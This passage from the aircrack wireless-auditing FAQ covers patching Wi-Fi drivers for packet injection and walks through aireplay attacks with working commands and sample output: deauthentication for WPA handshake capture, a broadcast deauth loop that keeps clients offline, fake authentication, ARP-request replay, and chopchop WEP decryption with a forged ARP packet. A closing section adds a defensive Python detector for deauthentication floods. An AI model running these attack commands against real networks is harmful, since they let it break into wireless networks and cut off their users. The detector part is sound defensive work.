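    print(pmk.hex(), calls)      # matches hashlib; 8192 HMAC-SHA1 calls
    print(pmk_depends_on_essid("password", "IEEE", "ieee"))
```

    The hex string printed for "password" / "IEEE" is what would go on the
    pmk= line of the network block shown above for that network. Since the
    ESSID enters the derivation as the salt, a table of PMKs built for one
    ESSID is useless for any other, which is the point made in the WPA-PSK
    entry.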

How do I patch the driver for injection with aireplay ?

    As of now, aireplay only supports injection on Prism2, PrismGT (FullMAC),
    Atheros, RTL8180 and Ralink 2500. Injection on other chipsets (including,
    but not limited to, HermesI, Aironet and Centrino) is not supported because
    of firmware and/or driver limitations.
   
    Injection on Prism2 and Atheros is still pretty much experimental; if your
    card appears to hang (no packets captured or injected), disable the
    interface, reload the drivers and re-insert the card. Also consider
    updating the firmware (if Prism2).
   
    All drivers must be patched so as to support injection in Monitor mode. You
    will need linux headers that match your current running kernel; if not, you
    will have to download the linux source and compile a custom kernel.
   
    If you have trouble patching and compiling stuff, you may want to use the 
    WHAX or Auditor LiveCD; both already include patched device drivers.
   
      + Installing the madwifi driver (Atheros cards)
       
        Note 1: you'll need uudecode from the sharutils package.
       
        Note 2: the madwifi patch crashes some versions of the 2.6 kernel. If
        this happens, use Linux 2.4.x or 2.6.11.x instead of your current
        kernel.
       
        Note 3: do not use a newer version of the madwifi CVS. The last known
        stable version is 2005-07-07.
       
        ifconfig ath0 down
        rmmod ath_pci 2>/dev/null
        rmmod wlan 2>/dev/null
        
        cd /usr/src
        wget http://100h.org/wlan/linux/atheros/madwifi-cvs-20050707.tgz
        wget http://100h.org/wlan/linux/patches/madwifi-cvs-20050707.patch
        tar -xvzf madwifi-cvs-20050707.tgz
        cd madwifi-cvs-20050707
        patch -Np1 -i ../madwifi-cvs-20050707.patch
        make && make install
        modprobe ath_pci
       
        Since aircrack-2.2-beta12, the madwifi patch adds support for injection
        in Auto (b/g) mode. Do not use the "iwpriv ath0 mode 2" command
        anymore; instead, run:
       
        iwpriv ath0 mode 0
       
                         +-----------------------------------+                 
                         | Allowed modes |  Physical medium  |                 
                         |---------------+-------------------|                 
                         | Mode 0        | Automatic (a/b/g) |                 
                         |---------------+-------------------|                 
                         | Mode 1        | 802.11a only      |                 
                         |---------------+-------------------|                 
                         | Mode 2        | 802.11b only      |                 
                         |---------------+-------------------|                 
                         | Mode 3        | 802.11g only      |                 
                         +-----------------------------------+                 
       
        Also, it is now possible to set the transmit rate with madwifi. The
        default rate is set to 5.5 Mbps, but you can lower it or raise it,
        depending on your distance from the AP. For example:
       
        iwconfig ath0 rate 24M
       
        When using attacks 2, 3 and 4, changing the number of packets per
        second sent by aireplay (option -x) sometimes helps to get better
        results; the default is 500 pps.
       
                   +----------------------------------------------+            
                   | Modulation |          Allowed rates          |            
                   |------------+---------------------------------|            
                   | DSSS (11b) | 1M, 2M, 5.5M, 11M               |            
                   |------------+---------------------------------|            
                   | OFDM (11g) | 6M, 9M, 12M, 24M, 36M, 48M, 54M |            
                   +----------------------------------------------+            
       
      + Installing the prism54 driver (PrismGT FullMAC cards)
       
        ifconfig eth1 down
        rmmod prism54 2>/dev/null
        
        cd /usr/src
        wget http://100h.org/wlan/linux/prismgt/prism54-svn-20050724.tgz
        wget http://100h.org/wlan/linux/patches/prism54-svn-20050724.patch
        tar -xvzf prism54-svn-20050724.tgz
        cd prism54-svn-20050724
        patch -Np1 -i ../prism54-svn-20050724.patch
        make modules && make install
        wget http://100h.org/wlan/linux/prismgt/1.0.4.3.arm
        mkdir -p /usr/lib/hotplug/firmware
        mkdir -p /lib/firmware
        cp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
        mv 1.0.4.3.arm /lib/firmware/isl3890
        depmod -a
       
      + Installing the HostAP driver (Prism2 cards)
       
        ifconfig wlan0 down
        wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable 2>/dev/null
        /etc/init.d/pcmcia stop
        rmmod prism2_pci 2>/dev/null
        rmmod hostap_pci 2>/dev/null
        
        cd /usr/src
        wget http://100h.org/wlan/linux/prism2/hostap-driver-0.3.9.tar.gz
        wget http://100h.org/wlan/linux/patches/hostap-driver-0.3.9.patch
        tar -xvzf hostap-driver-0.3.9.tar.gz
        cd hostap-driver-0.3.9
        patch -Np1 -i ../hostap-driver-0.3.9.patch
        make && make install
        mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~
        /etc/init.d/pcmcia start
        modprobe hostap_pci &>/dev/null
       
      + Installing the wlan-ng driver (Prism2 cards)
       
        Important note: when the card is inserted, wlan-ng will flash the
        firmware in RAM (volatile download) with versions PRI 1.1.4 and STA
        1.8.3. Many users experienced problems with this operation, so in any
        case it's safer to just use hostap instead. Furthermore, HostAP works
        more reliably and supports iwconfig whereas wlan-ng doesn't.
       
        ifconfig wlan0 down
        wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable 2>/dev/null
        /etc/init.d/pcmcia stop
        rmmod prism2_pci 2>/dev/null
        rmmod hostap_pci 2>/dev/null
        find /lib/modules \( -name p80211* -o -name prism2* \) \
            -exec rm -v {} \;
        
        cd /usr/src
        wget http://100h.org/wlan/linux/prism2/wlanng-0.2.1-pre26.tar.gz
        wget http://100h.org/wlan/linux/patches/wlanng-0.2.1-pre26.patch
        tar -xvzf wlanng-0.2.1-pre26.tar.gz
        cd wlanng-0.2.1-pre26
        patch -Np1 -i ../wlanng-0.2.1-pre26.patch
        make config && make all && make install
        mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~ 2>/dev/null
        /etc/init.d/pcmcia start
        modprobe prism2_pci &>/dev/null
       
      + Installing the r8180-sa2400 driver (RTL8180 cards)
       
        ifconfig wlan0 down
        rmmod r8180 2>/dev/null
        
        cd /usr/src
        wget http://100h.org/wlan/linux/rtl8180/rtl8180-0.21.tar.gz
        wget http://100h.org/wlan/linux/patches/rtl8180-0.21.patch
        tar -xvzf rtl8180-0.21.tar.gz
        cd rtl8180-0.21
        patch -Np1 -i ../rtl8180-0.21.patch
        make && make install
        modprobe r8180
       
      + Installing the rt2500 driver (Ralink b/g cards)
       
        ifconfig ra0 down
        rmmod rt2500 2>/dev/null
        
        cd /usr/src
        wget http://100h.org/wlan/linux/ralink/rt2500-cvs-20050724.tgz
        wget http://100h.org/wlan/linux/patches/rt2500-cvs-20050724.patch
        tar -xvzf rt2500-cvs-20050724.tgz
        cd rt2500-cvs-20050724
        patch -Np1 -i ../rt2500-cvs-20050724.patch
        cd Module
        make && make install
        modprobe rt2500

The driver won't compile.

    This usually happens because the Linux headers don't match your currently
    running kernel. In this situation, just recompile a fresh kernel, install
    it and reboot. Then try compiling the driver again.
   
    See this HOWTO for more details about kernel recompilation.

How do I use aireplay ?

    If the driver was properly patched, aireplay is able to inject raw 802.11
    packets in Monitor mode; it currently implements a set of five different
    attacks.
   
    With some versions of the Linux kernel, injection will trigger some
    "protocol 0300 is buggy, dev ath0" or "protocol 1900 is buggy, dev wlan0"
    debug messages, which are totally harmless and can be ignored safely. Run
    "dmesg -n 1" to prevent these messages from flooding the console.
   
    If you get "ioctl(SIOCGIFINDEX) failed: No such device", double check that
    your device name is correct and that you haven't forgotten a parameter on
    the command line.
   
    In the following examples, 00:13:10:30:24:9C is the MAC address of the
    access point (on channel 6), and 00:09:5B:EB:C5:2B is the MAC address of a
    wireless client.
   
      + Attack 0: deauthentication
       
        This attack is mostly useful to recover a hidden (not broadcast) ESSID
        and for capturing WPA handshakes by forcing clients to reauthenticate.
        It can also be used to generate ARP requests, as Windows clients
        sometimes flush their ARP cache when disconnected. Of course, this
        attack is totally useless if there are no wireless clients.
       
        Some examples:
       
          o WPA Handshake capture with an Atheros
           
            airmon.sh start ath0
            airodump ath0 out 6  (switch to another console)
            aireplay -0 5 -a 00:13:10:30:24:9C ath0; sleep 5
            aircrack -w /path/to/dictionary out.cap
           
          o ARP request generation with a Prism2 card
           
            airmon.sh start wlan0
            airodump wlan0 out 6  (switch to another console)
            aireplay -0 5 -a 00:13:10:30:24:9C wlan0
            aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
           
            After sending the five batches of deauthentication packets, we
            start listening for ARP requests with attack "3". The -h option is
            mandatory and has to be the MAC address of an associated client.
           
            If the driver is wlan-ng, it is mandatory to run the airmon.sh
            script -- otherwise the card won't be set up properly for injection.
           
          o Mass denial-of-service with a RT2500 card
           
            airmon.sh start ra0
            aireplay -0 0 -a 00:13:10:30:24:9C ra0
           
            With parameter 0, this attack will loop forever sending
            deauthentication packets to the broadcast address, thus preventing
            clients from staying connected.
       
      + Attack 1: fake authentication
       
        This attack is particularly useful when there are no associated
        clients: we create a fake client MAC address which will be registered
        in the AP's association table. This address will then be used for
        attacks 3 (ARP request reinjection) and 4 ("chopchop" WEP decryption).
       
        However, if this attack fails and there is already an associated client,
        it's more reliable to just use its MAC address (here,
        00:09:5B:EB:C5:2B) in attacks 3 and 4.
       
        aireplay -1 0 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
        12:14:06  Sending Authentication Request
        12:14:06  Authentication successful
        12:14:06  Sending Association Request
        12:14:07  Association successful :-)
       
        Some access points require clients to reassociate every 30 seconds,
        otherwise our fake client is considered disconnected. In this case, set
        the periodic re-association delay:
       
        aireplay -1 30 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
       
        If this attack seems to fail (aireplay keeps sending authentication
        requests), make sure that:
       
          o You are close enough to the access point.
          o The driver is properly patched and installed.
          o The card is configured on the same channel as the AP.
          o The BSSID and ESSID (-a / -e options) are correct.
          o If Prism2, make sure the firmware was updated.
          o If Atheros, try running "iwpriv ath0 mode 2" or
            "iwpriv ath0 mode 0" if patched with 20050707.
       
        I'll say it again: you can't inject with a Centrino, Hermes, ACX1xx,
        Aironet, Marvell, Broadcom or Prism54 USB chipset.
       
      + Attack 2: interactive packet replay
       
        This attack is mostly useless and is present for debugging purposes
        only. You could use it, for example, to replay "ToDS" packets coming
        from a wireless client; but in any case, attack 3 (ARP reinjection) is
        more effective.
       
        aireplay -2 -f 0 -t 1 -d FF:FF:FF:FF:FF:FF -n 90 ath0
       
      + Attack 3: ARP-request reinjection
       
        The classic ARP-request replay attack is the most effective way to
        generate new IVs, and works very reliably. You need either the MAC
        address of an associated client (00:09:5B:EB:C5:2B) or a fake MAC from
        attack 1 (0:1:2:3:4:5). You may have to wait for a couple of minutes,
        or even longer, until an ARP request shows up; this attack will fail if
        there is no traffic.
       
        aireplay -3 -b 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
        Saving ARP requests in replay_arp-0627-121526.cap
        You must also start airodump to capture replies.
        Read 2493 packets (got 1 ARP requests), sent 1305 packets...
       
      + Attack 4: KoreK's "chopchop" (WEP decryption)
       
        This attack, when successful, can decrypt a WEP data packet without
        knowing the key. It can even work against dynamic WEP. However, most
        access points are not vulnerable at all. Some may seem vulnerable at
        first but actually drop data packets shorter than 60 bytes.
       
         1. First, we decrypt one packet :
           
            aireplay -4 -h 00:09:5B:EB:C5:2B ath0
           
         2. Let's have a look at the IP address :
           
            tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
            reading from file replay_dec-0627-022301.cap, link-type [...]
            IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
           
         3. Then, forge an ARP request.
           
            The source IP (192.168.1.100) doesn't matter, but the destination
            IP (192.168.1.2) must respond to ARP requests. The source MAC must
            belong to an associated station.
           
            ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
            00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap
           
         4. And replay our forged ARP request :
           
            aireplay -2 -r arp.cap ath0
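    Because attack 0 works by spoofing management frames that any card in
    Monitor mode can see, a wireless IDS spots it by counting deauthentication
    and disassociation frames per source address. The following is an added
    example, not part of aircrack: it parses raw 802.11 management frames and
    flags bursts, distinguishing a broadcast flood from a single legitimate
    deauthentication. The sample frames are constructed inline and reuse the AP
    and client addresses from the examples above; the threshold and window are
    assumed values to tune per site.

```python
import struct
from collections import defaultdict, deque

# Frame Control byte 0 = subtype<<4 | type<<2 | version; type 0 = management frame.
FC_BEACON, FC_DISASSOC, FC_DEAUTH = 0x80, 0xA0, 0xC0      # subtypes 8, 10, 12
BROADCAST = "ff:ff:ff:ff:ff:ff"

def parse_mgmt(frame):
    """Raw 802.11 frame (no radiotap, pcap link-type 105) -> (subtype_byte, dst, src,
    bssid, reason) for management frames, None otherwise; reason only for deauth/disassoc."""
    if len(frame) < 24 or (frame[0] & 0x0F) != 0x00:       # version 0, type 0 only
        return None
    fc, reason = frame[0] & 0xF0, None
    if fc in (FC_DEAUTH, FC_DISASSOC) and len(frame) >= 26:
        reason = struct.unpack("<H", frame[24:26])[0]      # reason code, little-endian
    return fc, frame[4:10].hex(":"), frame[10:16].hex(":"), frame[16:22].hex(":"), reason

def detect_deauth_flood(packets, threshold=5, window=2.0):
    """packets: (timestamp_seconds, raw_frame) pairs in capture order. Flags a source
    that sends >= threshold deauth/disassoc frames within `window` seconds and notes
    whether any went to broadcast (mass disconnect) rather than to one client."""
    recent, alerts = defaultdict(deque), {}
    for ts, frame in packets:
        parsed = parse_mgmt(frame)
        if parsed is None or parsed[0] not in (FC_DEAUTH, FC_DISASSOC):
            continue
        _, dst, src, bssid, _ = parsed
        q = recent[src]
        q.append((ts, dst))
        while ts - q[0][0] > window:                       # expire frames outside the window
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(src, {"bssid": bssid, "count": 0, "broadcast": False})
            a["count"] = max(a["count"], len(q))
            a["broadcast"] = a["broadcast"] or any(d == BROADCAST for _, d in q)
    return alerts

def make_mgmt(fc, dst, src, bssid, body=b""):
    """Minimal management frame: FC, duration, addr1-3, seq ctl, body (constructed test data)."""
    hdr = bytes([fc, 0x00, 0x00, 0x00])
    for m in (dst, src, bssid):
        hdr += bytes.fromhex(m.replace(":", ""))
    return hdr + b"\x00\x00" + body

AP, CLIENT = "00:13:10:30:24:9c", "00:09:5b:eb:c5:2b"     # addresses used in the FAQ
SAMPLE = [(0.0, make_mgmt(FC_BEACON, BROADCAST, AP, AP, b"\x00" * 12)),
          (0.5, make_mgmt(FC_DEAUTH, CLIENT, AP, AP, struct.pack("<H", 3)))]   # one normal deauth
SAMPLE += [(1.0 + 0.01 * i, make_mgmt(FC_DEAUTH, BROADCAST, AP, AP, struct.pack("<H", 7)))
           for i in range(6)]                                                  # burst to broadcast
```

    On a real capture, feed the frames in with their pcap timestamps; a single
    deauthentication to one client (the second sample frame) never trips the
    detector on its own.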

-------------------------------------------------------------------------------

    Finally, I'd like to thank all the many, many people who contributed to
    aircrack... you know who you are :-)

-------------------------------------------------------------------------------
